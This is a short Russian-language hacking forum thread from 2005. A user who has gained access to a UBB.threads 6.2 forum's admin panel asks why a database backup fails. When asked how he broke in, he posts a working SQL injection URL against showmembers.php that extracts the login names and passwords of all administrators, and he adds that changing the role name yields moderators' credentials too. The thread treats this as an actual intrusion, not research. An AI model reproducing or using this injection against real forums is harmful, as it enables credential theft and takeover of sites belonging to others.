Форумы Уязвимости в UBB.threads 6.2

Discussion in 'Уязвимости CMS/форумов' started by afonya, 31 Mar 2005.

  1. afonya

    afonya New Member

    Joined:
    31 Mar 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Хола ! народ посоветуйте плиз...
    ситуация такая... я в админке форума UBB.threads 6.2 папробовал сделать бэкап базы думал что произайдёт приблезительно тоже что и с phpBB, тоесть он хотябы придолжет скачять этот бэкап... но этого не произашло...
    )):

    чё делть... ?! мож кто сталкивался с этим....
     
  2. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    скажи плиз, как ты его взломал?
     
  3. afonya

    afonya New Member

    Joined:
    31 Mar 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    UBB.threads 6.2.*-6.3.* sql-injection:
    http://[host]/showmembers.php?Cat=&like=1'%20union%20select%20U_LoginName,0,0,U_Password,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*
    Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров.
     
  4. forever777

    forever777 Banned

    Joined:
    12 Jun 2005
    Messages:
    224
    Likes Received:
    20
    Reputations:
    -12
    если уязвимости в UBB.threads™ 6.1.1???